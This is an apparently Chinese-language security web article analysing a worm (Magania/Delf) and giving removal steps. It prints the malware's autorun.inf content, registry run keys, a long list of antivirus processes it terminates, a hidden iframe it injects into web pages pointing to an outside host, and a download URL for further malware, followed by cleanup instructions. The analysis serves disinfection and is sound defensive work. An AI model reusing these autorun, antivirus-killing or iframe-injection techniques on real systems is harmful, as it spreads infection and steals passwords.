各分区根目录释放shell.exe,autorun.inf 的病毒清除方法
各分区根目录释放shell.exe,autorun.inf 的病毒清除方法
发布时间:2016-12-26 来源:查字典编辑
摘要:病毒名:Trojan-psw.Win32.Magania.os卡巴Worm.Win32.Delf.ysa瑞星文件变化:释放文件C:WINDO...

病毒名:Trojan-psw.Win32.Magania.os卡巴

Worm.Win32.Delf.ysa瑞星

文件变化:

释放文件

C:WINDOWSsystem32Shell.exe

C:WINDOWSsystem32Shell.pci

C:pass.dic

各分区根目录释放

shell.exe

autorun.inf

autorun.inf内容

[Autorun]

OPEN=Shell.exe

shellexecute=Shell.exe

shellAutocommand=Shell.exe

修改注册表:

创建启动项目

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]

<Shell.exe><C:WINDOWSsystem32Shell.exe>

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL]

为0

破坏显示隐藏文件

其他行为

停止server服务

查找SOFTWAREMicrosoftWindowsCurrentVersionUninstall密码防盗专家综合版注册表项

找到则将其删除

终止以下进程或关闭窗口

KVXP.KXP

KVMonXP.KXP

RavMon.exe

RavMonClass

TfLockDownMain

ZoneAlarm

ZAFrameWnd

VirusScan

SymantecAntiVirus

Duba

WrappedgiftKiller

IceSword

pjf(ustc)

EGHOST.EXE

PasswordGuard.exe

MAILMON.EXE

KAVPFW.EXE

IPARMOR.EXE

_AVP32.EXE..

_AVPCC.EXE

_AVPM.EXEAVP32.EXE

AVPCC.EXE

AVPM.EXE

AVP.EXE

NAVAPW32.EXE

NAVW32.EXE

nod32kui.exe

nod32kru.exe

PFW.exe

Kfw.exe

KAVPFW.exe

vsmon.exe

Mcshield.exe

VsTskMgr.exe

naPrdMgr.exe

UpdaterUI.exe

TBMon.exe

scan32.exe

Ravmond.exe

CCenter.exe

RavTask.exe

Rav.exe

Ravmon.exe

RavmonD.exe

RavStub.exe

KVXP.kxp

KvMonXP.kxp

KVCenter.kxp

KVSrvXP.exe

KRegEx.exe

UIHost.exe

TrojDie.kxp

360Safe.exe

360tray.kxp

FrogAgent.exe

FYFireWall.exe

Rundl132.exe

Logo_1.exe

Logo1_.exe

遍历非系统分区的.ASP.exe.com.pif.exe.ASPX.COM.HTM.HTML.JSP.PHP文件

感染.ASP

.ASPX

.COM

.HTM

.HTML

.JSP

.PHP

文件

在其后面加入<iframesrc=http://www.photoyahoo5.comwidth=0height=0></iframe>的代码

感染.exe.com.pif.exe

在其头部加入64516字节的内容属于文件头寄生感染

连接网络下载hXXp://www.photoyahoo5.com/tools/01.exe到C盘根目录下

清除方法:

1.安全模式下:(重启系统长按F8直到出现提示,然后选择进入安全模式)

把下面的代码拷入记事本中然后另存为1.reg文件

WindowsRegistryEditorVersion5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL]

"RegPath"="SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced"

"Text"="@shell32.dll,-30500"

"Type"="radio"

"CheckedValue"=dword:00000001

"ValueName"="Hidden"

"DefaultValue"=dword:00000002

"HKeyRoot"=dword:80000001

"HelpID"="shell.hlp#51105"

双击1.reg把这个注册表项导入

双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹"并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是”然后确定

然后删除

C:WINDOWSsystem32Shell.exe

C:WINDOWSsystem32Shell.pci

C:pass.dic

以及各个分区下面的shell.exe

autorun.inf

2.删除病毒启动项(开始菜单-运行-输入“msconfig”-启动-删除带Shell的项)

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]

<Shell.exe><C:WINDOWSsystem32Shell.exe>

3.利用反病毒软件修复受感染的exe文件

4.修复被修改的网页文件

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新病毒查杀学习
热门病毒查杀学习
实用技巧子分类